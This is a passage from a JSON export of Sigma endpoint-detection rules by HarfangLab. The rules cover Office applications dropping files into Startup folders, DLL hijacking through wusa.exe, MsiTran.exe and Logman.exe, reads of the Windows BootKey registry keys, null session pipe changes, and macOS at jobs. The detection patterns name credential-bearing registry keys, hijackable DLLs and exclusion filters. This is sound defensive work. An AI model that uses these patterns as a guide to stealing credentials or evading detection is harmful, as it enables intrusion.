"content": "title: Suspicious File Added/Modified in Startup Directory by Office Application\nid: 1548f31b-b093-436b-a9cb-97bc28e00de7\ndescription: |\n Detects when a file is added or modified in the startup directory in relation with a phishing attack.\n After compromising a host, attackers may achieve persistence by adding a program to a startup folder.\n It is recommended to analyze the process dropping the file as well as the file itself to look for malicious content.\nreferences:\n - https://attack.mitre.org/techniques/T1547/001/\ndate: 2022/06/20\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Phishing\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: filesystem_event\ndetection:\n selection_event:\n Kind:\n - 'create'\n - 'write'\n Path|contains:\n - '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\' # individual user : c:\\users\\xxx\\appdata\\...\n - '\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\' # all users\n\n selection_image:\n ProcessImage|endswith:\n - '\\WINWORD.EXE'\n - '\\EXCEL.EXE'\n - '\\OUTLOOK.EXE'\n - '\\MSPUB.EXE'\n - '\\POWERPNT.EXE'\n\n selection_parentimage:\n ProcessParentImage|endswith:\n - '\\WINWORD.EXE'\n - '\\EXCEL.EXE'\n - '\\OUTLOOK.EXE'\n - '\\MSPUB.EXE'\n - '\\POWERPNT.EXE'\n\n selection_extension:\n Path|endswith:\n - '.bat'\n - '.chm'\n - '.cmd'\n - '.cpl'\n - '.exe'\n - '.hta'\n - '.js'\n - '.jse'\n - '.lnk'\n - '.ps1'\n - '.scr'\n - '.vbe'\n - '.vbs'\n - '.wsf'\n\n exclusion_onenote:\n ProcessImage: '*\\Office??\\ONENOTE.EXE'\n Path:\n - '*OneNote*.lnk' # Envoyer a OneNote.lnk / Send to OneNote.lnk / An OneNote senden.lnk\n - '*\\OneNote ???? *.lnk' # OneNote 2010 Screen Clipper and Launcher.lnk / OneNote 2010 - Capture d'ecran et lancement.lnk\n\n exclusion_astngo:\n ProcessCommandLine|contains: '--single-argument https://my.astngo.com/'\n\n condition: selection_event and selection_extension and (selection_image or selection_parentimage) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1548f31b-b093-436b-a9cb-97bc28e00de7",
"rule_name": "Suspicious File Added/Modified in Startup Directory by Office Application",
"rule_description": "Detects when a file is added or modified in the startup directory in relation with a phishing attack.\nAfter compromising a host, attackers may achieve persistence by adding a program to a startup folder.\nIt is recommended to analyze the process dropping the file as well as the file itself to look for malicious content.\n",
"rule_creation_date": "2022-06-20",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1547.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "156f56a4-6a01-405e-9c87-d4546f76e6a1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.588600Z",
"creation_date": "2026-03-23T11:45:34.588603Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.588611Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wusa.yml",
"content": "title: DLL Hijacking via wusa.exe\nid: 156f56a4-6a01-405e-9c87-d4546f76e6a1\ndescription: |\n Detects potential Windows DLL Hijacking via wusa.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wusa.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dpx.dll'\n - '\\WTSAPI32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "156f56a4-6a01-405e-9c87-d4546f76e6a1",
"rule_name": "DLL Hijacking via wusa.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wusa.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "15957b9b-c39e-4caf-af47-506917f3c1e2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095096Z",
"creation_date": "2026-03-23T11:45:34.095098Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095102Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://posts.specterops.io/remote-hash-extraction-on-demand-via-host-security-descriptor-modification-2cf505ec5c40",
"https://attack.mitre.org/techniques/T1552/002/"
],
"name": "t1003_002_susp_registry_read_bootkey.yml",
"content": "title: Windows Bootkey Read from Registry\nid: 15957b9b-c39e-4caf-af47-506917f3c1e2\ndescription: |\n Detects a suspicious read operation on registry keys storing Windows Bootkey also referred to as the SysKey.\n The BootKey/SysKey is an encryption key that is stored in the Windows SYSTEM registry hive.\n This key is used by several Windows components to encrypt sensitive information like the AD database, machine account password or system certificates.\n It is recommended to check whether the process accessing the registry keys has legitimate reasons to do it.\nreferences:\n - https://posts.specterops.io/remote-hash-extraction-on-demand-via-host-security-descriptor-modification-2cf505ec5c40\n - https://attack.mitre.org/techniques/T1552/002/\ndate: 2024/04/02\nmodified: 2025/09/25\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1552.002\n - attack.discovery\n - attack.t1012\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'ReadValue'\n TargetObject|startswith:\n - 'HKLM\\SYSTEM\\CURRENTCONTROLSET\\CONTROL\\LSA\\JD\\'\n - 'HKLM\\SYSTEM\\CONTROLSET???\\CONTROL\\LSA\\JD\\'\n - 'HKLM\\SYSTEM\\CURRENTCONTROLSET\\CONTROL\\LSA\\SKEW1\\'\n - 'HKLM\\SYSTEM\\CONTROLSET???\\CONTROL\\LSA\\SKEW1\\'\n - 'HKLM\\SYSTEM\\CURRENTCONTROLSET\\CONTROL\\LSA\\GBG\\'\n - 'HKLM\\SYSTEM\\CONTROLSET???\\CONTROL\\LSA\\GBG\\'\n - 'HKLM\\SYSTEM\\CURRENTCONTROLSET\\CONTROL\\LSA\\DATA\\'\n - 'HKLM\\SYSTEM\\CONTROLSET???\\CONTROL\\LSA\\DATA\\'\n\n filter_lsass:\n Image:\n - '?:\\Windows\\System32\\lsass.exe'\n - '\\Device\\VhdHardDisk{????????-????-????-????-????????????}\\Windows\\System32\\lsass.exe'\n\n filter_logonui:\n ProcessImage: '?:\\Windows\\System32\\logonui.exe'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_setup_host:\n - Image: '?:\\$WINDOWS.~BT\\Sources\\\\*.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n # Altered versions of Windows can sometimes be unsigned.\n - Image: '?:\\$WINDOWS.~BT\\Sources\\\\*.exe'\n ProcessParentOriginalFileName: 'SetupPrep.exe'\n\n # Too many fp, maybe a normal behavior in order to decode some information in registry\n exclusion_regedit:\n Image:\n - '?:\\Windows\\regedit.exe'\n - '?:\\Windows\\SysWOW64\\regedit.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_wmiprvse:\n Image: '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n\n exclusion_ivanti:\n Image|endswith: '\\SupportToolkit.exe'\n ProcessOriginalFileName: 'SupportToolkit.exe'\n ProcessDescription: 'Ivanti Support Toolkit'\n\n exclusion_fennec_windows:\n ProcessOriginalFileName: 'Fox.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "15957b9b-c39e-4caf-af47-506917f3c1e2",
"rule_name": "Windows Bootkey Read from Registry",
"rule_description": "Detects a suspicious read operation on registry keys storing Windows Bootkey also referred to as the SysKey.\nThe BootKey/SysKey is an encryption key that is stored in the Windows SYSTEM registry hive.\nThis key is used by several Windows components to encrypt sensitive information like the AD database, machine account password or system certificates.\nIt is recommended to check whether the process accessing the registry keys has legitimate reasons to do it.\n",
"rule_creation_date": "2024-04-02",
"rule_modified_date": "2025-09-25",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1012",
"attack.t1552.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "15aecbb0-3084-4252-96c2-c5ab1b3d4ea3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621211Z",
"creation_date": "2026-03-23T11:45:34.621213Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621217Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://web.archive.org/web/20230726161232/",
"https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity",
"https://attack.mitre.org/techniques/T1021/001/",
"https://attack.mitre.org/techniques/T1021/002/",
"https://attack.mitre.org/techniques/T1071/"
],
"name": "t1021_001_nullsessionpipe_added_in_registry.yml",
"content": "title: Null Session Pipe Added in Registry\nid: 15aecbb0-3084-4252-96c2-c5ab1b3d4ea3\ndescription: |\n Detects the modification of the LanmanServer Registry configuration allowing for Null Sessions to access a new pipe.\n Attackers can use this technique to allow all anonymous users to access a specific pipe, for example to perform lateralization through RDP.\n It is recommended to analyze the process responsible for the registry modification to look for malicious content or actions, and to investigate any subsequent suspicious actions (e.g RDP) on the host.\nreferences:\n - https://web.archive.org/web/20230726161232/\n - https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity\n - https://attack.mitre.org/techniques/T1021/001/\n - https://attack.mitre.org/techniques/T1021/002/\n - https://attack.mitre.org/techniques/T1071/\ndate: 2022/11/28\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.002\n - attack.defense_evasion\n - attack.t1112\n - attack.t1562\n - attack.command_and_control\n - attack.t1071\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\System\\CurrentControlSet\\Services\\LanManServer\\Parameters\\NullSessionPipes'\n\n filter_empty:\n Details:\n - ''\n - '(Empty)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n # This excludes registry modifications coming from local security strategies.\n exclusion_services:\n ProcessImage: '?:\\Windows\\System32\\services.exe'\n ProcessParentImage: '?:\\Windows\\System32\\wininit.exe'\n ProcessUserSID: 'S-1-5-18'\n\n exclusion_expressconnect:\n ProcessImage:\n - '?:\\Program Files\\ExpressConnect\\ExpressConnect.exe'\n - '?:\\Program Files (x86)\\ExpressConnect\\ExpressConnect.exe'\n\n exclusion_raps:\n ProcessImage: '?:\\Program Files\\Rivet Networks\\SmartByte\\RAPS.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Rivet Networks LLC'\n\n exclusion_tiworker:\n - ProcessCommandLine: '?:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_*\\TiWorker.exe -Embedding'\n - ProcessParentCommandLine: '?:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_*\\TiWorker.exe -Embedding'\n\n exclusion_rivet:\n ProcessParentImage:\n - '?:\\Program Files\\Rivet Networks\\SmartByte\\RAPSService.exe'\n - '?:\\Windows\\System32\\drivers\\RivetNetworks\\Killer\\KAPSService.exe'\n - '?:\\Windows\\System32\\drivers\\RivetNetworks\\Killer\\KSPSService.exe'\n - '?:\\Windows\\System32\\drivers\\RivetNetworks\\Killer\\xTendSoftAPService.exe'\n - '?:\\Windows\\System32\\drivers\\RivetNetworks\\Killer\\xTendUtilityService.exe'\n\n exclusion_lsass:\n ProcessImage: '?:\\Windows\\System32\\lsass.exe'\n Details:\n - ';netlogon;samr'\n - ';netlogon;samr;lsarpc'\n\n exclusion_etiam:\n ProcessImage: '?:\\Program Files (x86)\\ETIAM\\IDA\\idaSCP.exe'\n\n exclusion_epson:\n ProcessImage|endswith: '\\PLPOUSVR.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'SEIKO EPSON CORPORATION'\n\n exclusion_hp:\n ProcessImage|endswith: '\\flcdlock.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'HP Inc.'\n - 'Hewlett Packard Enterprise Company'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "15aecbb0-3084-4252-96c2-c5ab1b3d4ea3",
"rule_name": "Null Session Pipe Added in Registry",
"rule_description": "Detects the modification of the LanmanServer Registry configuration allowing for Null Sessions to access a new pipe.\nAttackers can use this technique to allow all anonymous users to access a specific pipe, for example to perform lateralization through RDP.\nIt is recommended to analyze the process responsible for the registry modification to look for malicious content or actions, and to investigate any subsequent suspicious actions (e.g RDP) on the host.\n",
"rule_creation_date": "2022-11-28",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.002",
"attack.t1071",
"attack.t1112",
"attack.t1562"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "15cc636a-9f89-4eaa-b9fe-04eb31aca42e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.587835Z",
"creation_date": "2026-03-23T11:45:34.587838Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.587846Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://www.elastic.co/fr/security-labs/exploring-the-ref2731-intrusion-set",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_msitran.yml",
"content": "title: DLL Hijacking via MsiTran.exe\nid: 15cc636a-9f89-4eaa-b9fe-04eb31aca42e\ndescription: |\n Detects potential Windows DLL Hijacking via the Microsoft developer tool MsiTran.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://www.elastic.co/fr/security-labs/exploring-the-ref2731-intrusion-set\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/11/04\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'MsiTran.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith: '\\msi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Windows Kits\\10\\bin\\\\*\\x??\\'\n - '?:\\Program Files\\Windows Kits\\10\\bin\\\\*\\x??\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "15cc636a-9f89-4eaa-b9fe-04eb31aca42e",
"rule_name": "DLL Hijacking via MsiTran.exe",
"rule_description": "Detects potential Windows DLL Hijacking via the Microsoft developer tool MsiTran.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-11-04",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "15ce1c4e-d54d-4d1b-9248-cfbf35c8c14a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.593856Z",
"creation_date": "2026-03-23T11:45:34.593859Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.593867Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_logman.yml",
"content": "title: DLL Hijacking via Logman.exe\nid: 15ce1c4e-d54d-4d1b-9248-cfbf35c8c14a\ndescription: |\n Detects potential Windows DLL Hijacking via Logman.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'Logman.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\cabinet.dll'\n - '\\pdh.dll'\n - '\\pla.dll'\n - '\\sspicli.dll'\n - '\\wevtapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "15ce1c4e-d54d-4d1b-9248-cfbf35c8c14a",
"rule_name": "DLL Hijacking via Logman.exe",
"rule_description": "Detects potential Windows DLL Hijacking via Logman.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "15f0e956-c482-487d-a3f5-28d5c667c6a3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.598362Z",
"creation_date": "2026-03-23T11:45:34.598366Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.598374Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1053/002/"
],
"name": "t1053_002_at_jobs_created.yml",
"content": "title: At Jobs Created\nid: 15f0e956-c482-487d-a3f5-28d5c667c6a3\ndescription: |\n Detects the creation of an at job file.\n Adversaries may use at to execute programs at system startup or on a scheduled basis for persistence.\n It is recommended to check the content of the file for suspicious command and the activity of the process creating the file for other suspicious actions.\nreferences:\n - https://attack.mitre.org/techniques/T1053/002/\ndate: 2024/07/23\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1053.002\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Persistence\nlogsource:\n product: macos\n category: filesystem_event\ndetection:\n selection_files:\n - Path|startswith: '/private/var/at/jobs/'\n - TargetPath|startswith: '/private/var/at/jobs/'\n\n selection_access:\n Kind:\n - 'create'\n - 'rename'\n ProcessImage|contains: '?'\n\n condition: all of selection_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "15f0e956-c482-487d-a3f5-28d5c667c6a3",
"rule_name": "At Jobs Created",
"rule_description": "Detects the creation of an at job file.\nAdversaries may use at to execute programs at system startup or on a scheduled basis for persistence.\nIt is recommended to check the content of the file for suspicious command and the activity of the process creating the file for other suspicious actions.\n",
"rule_creation_date": "2024-07-23",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1053.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
